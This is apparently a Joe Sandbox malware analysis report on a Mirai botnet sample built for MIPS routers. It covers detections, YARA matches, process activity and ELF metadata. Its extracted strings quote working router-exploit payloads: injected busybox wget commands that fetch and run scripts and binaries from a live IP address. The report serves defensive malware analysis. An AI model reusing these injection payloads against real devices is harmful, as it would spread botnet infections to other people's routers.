Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
4wiwmAupak

Overview

General Information

Sample Name:4wiwmAupak
Analysis ID:679619
MD5:234f833a57b2626dbd7992faf3c2a149
SHA1:81915b94e27f542c1f8331a1f6b3317d82624805
SHA256:4738edac99f86b857032b8c7fb640b6fe5cf4109ae0c3a6e56deb84b0a76d936
Tags:32elfmipsmirai
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:679619
Start date and time: 06/08/202206:42:392022-08-06 06:42:39 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 16s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:4wiwmAupak
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal64.troj.lin@0/0@0/0
  • VT rate limit hit for: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Command:/tmp/4wiwmAupak
PID:6233
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Connected To CNC
Standard Error:
  • system is lnxubuntu20
  • cleanup
SourceRuleDescriptionAuthorStrings
4wiwmAupakSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x223c4:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x22434:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x224a4:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x22514:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x22584:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x227f4:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x22848:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x2289c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x228f0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x22944:$xo1: oMXKNNC\x0D\x17\x0C\x12
4wiwmAupakJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6233.1.00007fd554464000.00007fd554466000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x1584:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x15f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x166c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x16e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1754:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x19d4:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1a2c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1a84:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1adc:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1b34:$xo1: oMXKNNC\x0D\x17\x0C\x12
    6236.1.00007fd554464000.00007fd554466000.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x1584:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x15f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x166c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x16e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1754:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x19d4:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1a2c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1a84:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1adc:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x1b34:$xo1: oMXKNNC\x0D\x17\x0C\x12
    6233.1.00007fd554400000.00007fd554424000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
    • 0x223c4:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x22434:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x224a4:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x22514:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x22584:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x227f4:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x22848:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x2289c:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x228f0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x22944:$xo1: oMXKNNC\x0D\x17\x0C\x12
    6233.1.00007fd554400000.00007fd554424000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6236.1.00007fd554400000.00007fd554424000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
      • 0x223c4:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x22434:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x224a4:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x22514:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x22584:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x227f4:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x22848:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x2289c:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x228f0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x22944:$xo1: oMXKNNC\x0D\x17\x0C\x12
      Click to see the 1 entries
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 4wiwmAupakAvira: detected
      Source: 4wiwmAupakVirustotal: Detection: 61%Perma Link
      Source: 4wiwmAupakMetadefender: Detection: 31%Perma Link
      Source: 4wiwmAupakReversingLabs: Detection: 63%
      Source: /tmp/4wiwmAupak (PID: 6233)Socket: 127.0.0.1::44455Jump to behavior
      Source: 4wiwmAupakString found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
      Source: 4wiwmAupakString found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
      Source: 4wiwmAupakString found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
      Source: 4wiwmAupakString found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
      Source: 4wiwmAupakString found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
      Source: 4wiwmAupakString found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
      Source: 4wiwmAupakString found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
      Source: 4wiwmAupakString found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
      Source: 4wiwmAupakString found in binary or memory: http://purenetworks.com/HNAP1/
      Source: 4wiwmAupakString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: 4wiwmAupakString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: 4wiwmAupak, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6233.1.00007fd554464000.00007fd554466000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6236.1.00007fd554464000.00007fd554466000.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6233.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: 6236.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
      Source: classification engineClassification label: mal64.troj.lin@0/0@0/0
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1582/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2033/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2275/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/3088/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6191/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6192/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1612/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1579/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1699/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1335/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1698/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2028/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1334/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1576/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2302/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/3236/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2025/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2146/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/910/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/912/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/517/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/759/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2307/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/918/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6241/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6243/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6242/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/4462/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6245/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6244/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1594/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2285/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2281/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1349/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1623/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/761/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1622/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/884/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1983/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2038/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1344/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1465/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1586/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1463/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2156/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/800/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6238/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/801/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1629/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1627/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1900/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6252/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/4470/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6251/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6253/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6258/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/3021/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/491/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2294/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2050/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6250/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1877/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/772/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1633/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1599/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1632/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/774/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1477/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/654/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/896/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1476/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1872/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2048/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/655/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1475/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2289/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/656/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/777/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/657/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/658/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/4467/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/4468/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/4469/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/419/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/936/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1639/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/4503/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1638/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2208/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2180/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6262/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6265/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6266/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1809/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/6268/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1494/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1890/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2063/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/2062/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1888/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1886/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/420/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1489/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/785/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6235)File opened: /proc/1642/exeJump to behavior
      Source: /tmp/4wiwmAupak (PID: 6233)Queries kernel information via 'uname': Jump to behavior
      Source: 4wiwmAupak, 6233.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmp, 4wiwmAupak, 6236.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
      Source: 4wiwmAupak, 6233.1.00007ffc33963000.00007ffc33984000.rw-.sdmp, 4wiwmAupak, 6236.1.00007ffc33963000.00007ffc33984000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
      Source: 4wiwmAupak, 6233.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmp, 4wiwmAupak, 6236.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmpBinary or memory string: H+V!/etc/qemu-binfmt/mips
      Source: 4wiwmAupak, 6233.1.00007ffc33963000.00007ffc33984000.rw-.sdmp, 4wiwmAupak, 6236.1.00007ffc33963000.00007ffc33984000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/4wiwmAupakSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/4wiwmAupak

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 4wiwmAupak, type: SAMPLE
      Source: Yara matchFile source: 6233.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6236.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 4wiwmAupak, type: SAMPLE
      Source: Yara matchFile source: 6233.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6236.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
      OS Credential Dumping
      11
      Security Software Discovery
      Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 679619 Sample: 4wiwmAupak Startdate: 06/08/2022 Architecture: LINUX Score: 64 23 Antivirus / Scanner detection for submitted sample 2->23 25 Multi AV Scanner detection for submitted file 2->25 27 Yara detected Mirai 2->27 7 4wiwmAupak 2->7         started        process3 process4 9 4wiwmAupak 7->9         started        11 4wiwmAupak 7->11         started        13 4wiwmAupak 7->13         started        process5 15 4wiwmAupak 9->15         started        17 4wiwmAupak 9->17         started        19 4wiwmAupak 9->19         started        21 11 other processes 9->21
      SourceDetectionScannerLabelLink
      4wiwmAupak61%VirustotalBrowse
      4wiwmAupak31%MetadefenderBrowse
      4wiwmAupak63%ReversingLabsLinux.Trojan.Mirai
      4wiwmAupak100%AviraLINUX/Mirai.bonb
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://46.23.109.47/Cloud/Gpon.sh19%VirustotalBrowse
      http://46.23.109.47/Cloud/Gpon.sh100%Avira URL Cloudmalware
      http://46.23.109.47/Cloud/Cloud.x8618%VirustotalBrowse
      http://46.23.109.47/Cloud/Cloud.x86100%Avira URL Cloudmalware
      http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114100%Avira URL Cloudmalware
      http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI100%Avira URL Cloudmalware
      http://46.23.109.47/Cloud/Cloud.mpsl;chmod100%Avira URL Cloudmalware
      http://46.23.109.47/Cloud/Cloud.mips;100%Avira URL Cloudmalware
      http://purenetworks.com/HNAP1/0%URL Reputationsafe
      http://0.0.0.0/Cloud/Cloud.x860%Avira URL Cloudsafe
      http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$100%Avira URL Cloudmalware
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://46.23.109.47/Cloud/Gpon.sh4wiwmAupaktrue
      • 19%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://46.23.109.47/Cloud/Cloud.x864wiwmAupaktrue
      • 18%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=10392301144wiwmAupaktrue
      • Avira URL Cloud: malware
      unknown
      http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI4wiwmAupaktrue
      • Avira URL Cloud: malware
      unknown
      http://schemas.xmlsoap.org/soap/encoding/4wiwmAupakfalse
        high
        http://46.23.109.47/Cloud/Cloud.mpsl;chmod4wiwmAupaktrue
        • Avira URL Cloud: malware
        unknown
        http://46.23.109.47/Cloud/Cloud.mips;4wiwmAupaktrue
        • Avira URL Cloud: malware
        unknown
        http://purenetworks.com/HNAP1/4wiwmAupakfalse
        • URL Reputation: safe
        unknown
        http://0.0.0.0/Cloud/Cloud.x864wiwmAupakfalse
        • Avira URL Cloud: safe
        unknown
        http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$4wiwmAupaktrue
        • Avira URL Cloud: malware
        unknown
        http://schemas.xmlsoap.org/soap/envelope/4wiwmAupakfalse
          high
          No contacted IP infos
          No context
          No context
          No context
          No context
          No context
          No created / dropped files found
          File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
          Entropy (8bit):5.710060818234627
          TrID:
          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
          File name:4wiwmAupak
          File size:147164
          MD5:234f833a57b2626dbd7992faf3c2a149
          SHA1:81915b94e27f542c1f8331a1f6b3317d82624805
          SHA256:4738edac99f86b857032b8c7fb640b6fe5cf4109ae0c3a6e56deb84b0a76d936
          SHA512:73d07c52a01e8beeab7d78443a5102e9f4eac12f54e93c5bef4a021c235f37e03affdaaddc236d1d9a9bc79ca6a3bb24425cddb2b8fc3c93e87575ee0024a91d
          SSDEEP:3072:4rgHjxhR7/ZbV0yb6bZZeySx0eOn6WoexbY1wAhMwwRaeL:e0FXrnszehxWoubY1wwwl
          TLSH:D5E3B50D3E219F7DF7ACC23447B78A255258339A32E0D5C5D15CE9016EA028E786FF9A
          File Content Preview:.ELF.....................@.`...4..<......4. ...(.............@...@....3...3...............3..F3..F3....t...4........dt.Q............................<...'......!'.......................<...'......!... ....'9... ......................<...'......!........'9.

          ELF header

          Class:ELF32
          Data:2's complement, big endian
          Version:1 (current)
          Machine:MIPS R3000
          Version Number:0x1
          Type:EXEC (Executable file)
          OS/ABI:UNIX - System V
          ABI Version:0
          Entry Point Address:0x400260
          Flags:0x1007
          ELF Header Size:52
          Program Header Offset:52
          Program Header Size:32
          Number of Program Headers:3
          Section Header Offset:146604
          Section Header Size:40
          Number of Section Headers:14
          Header String Table Index:13
          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
          NULL0x00x00x00x00x0000
          .initPROGBITS0x4000940x940x8c0x00x6AX004
          .textPROGBITS0x4001200x1200x204500x00x6AX0016
          .finiPROGBITS0x4205700x205700x5c0x00x6AX004
          .rodataPROGBITS0x4205d00x205d00x2e000x00x2A0016
          .ctorsPROGBITS0x4633d40x233d40x80x00x3WA004
          .dtorsPROGBITS0x4633dc0x233dc0x80x00x3WA004
          .data.rel.roPROGBITS0x4633e80x233e80x100x00x3WA004
